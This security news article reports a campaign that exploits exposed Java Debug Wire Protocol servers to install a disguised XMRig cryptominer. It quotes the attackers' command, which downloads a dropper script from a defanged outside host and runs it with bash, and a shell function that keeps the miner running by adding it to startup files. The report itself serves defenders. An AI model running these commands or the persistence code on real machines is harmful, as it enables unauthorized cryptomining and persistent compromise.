Hackers Exploiting Java Debug Wire Protocol Servers in Wild to Deploy Cryptomining Payload

A new wave of cyberattacks is targeting organizations that inadvertently expose Java Debug Wire Protocol (JDWP) servers to the internet, with attackers leveraging this overlooked entry point to deploy sophisticated cryptomining malware.

JDWP, a standard feature in the Java platform, is designed to facilitate remote debugging by allowing developers to inspect live applications.

However, when JDWP is left accessible on production systems—often due to misconfiguration or the use of development flags in live environments—it becomes a potent vector for remote code execution.

The emergence of this threat has been marked by rapid exploitation cycles. In several observed incidents, attackers were able to compromise vulnerable machines within hours of exposure.

The attack flow typically begins with mass internet scans for open JDWP ports, most commonly port 5005. Once a target is identified, the attacker initiates a JDWP handshake to confirm the service is active and then establishes a session, gaining interactive access to the Java Virtual Machine (JVM).

This access allows the adversary to enumerate loaded classes and invoke methods, ultimately enabling arbitrary command execution on the host.

Wiz analysts identified this campaign after observing exploitation attempts against their honeypot servers running TeamCity, a popular CI/CD tool.

The attackers demonstrated a high degree of automation and customization, deploying a modified XMRig cryptominer with a hardcoded configuration to evade detection.

Attack Flow

Notably, the malware used mining pool proxies to obscure the destination wallet address, complicating efforts to trace or disrupt the illicit mining operation.

The impact of these attacks is significant. By abusing JDWP, threat actors can not only deploy cryptominers but also establish deep persistence, manipulate system processes, and potentially pivot to other assets within the compromised environment.

The stealthy nature of the payload, combined with its ability to blend in with legitimate system utilities, increases the risk of prolonged undetected activity and resource drain.

Focusing on the infection mechanism, the attackers exploit JDWP’s lack of authentication to inject and execute shell commands directly through the protocol.

After establishing a session, they typically download a dropper script—such as logservice.sh—using commands like:-

curl -o /tmp/logservice.sh -s https://canonicalconnect[.]com/logservice.sh
bash /tmp/logservice.sh

This script is engineered to kill competing miners, download the malicious XMRig binary disguised as logrotate, and install it in the user’s configuration directory.

The script then sets up multiple persistence mechanisms, including modifying shell startup files, creating cron jobs, and installing a fake system service.

The following excerpt illustrates how the script ensures persistence via shell configuration:-

add_to_startup() {
  if [ -r "$1" ]; then
    if ! grep -Fxq "$EXEC >/dev/null 2>&1" "$1"; then
      echo "$EXEC >/dev/null 2>&1" >> "$1"
    fi
  fi
}

The infection chain is both efficient and resilient, allowing the cryptominer to survive reboots and user logins.

The attackers’ use of legitimate-sounding process names and system locations further complicates detection and remediation efforts, underscoring the need for vigilant configuration management and robust monitoring of exposed services.

Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now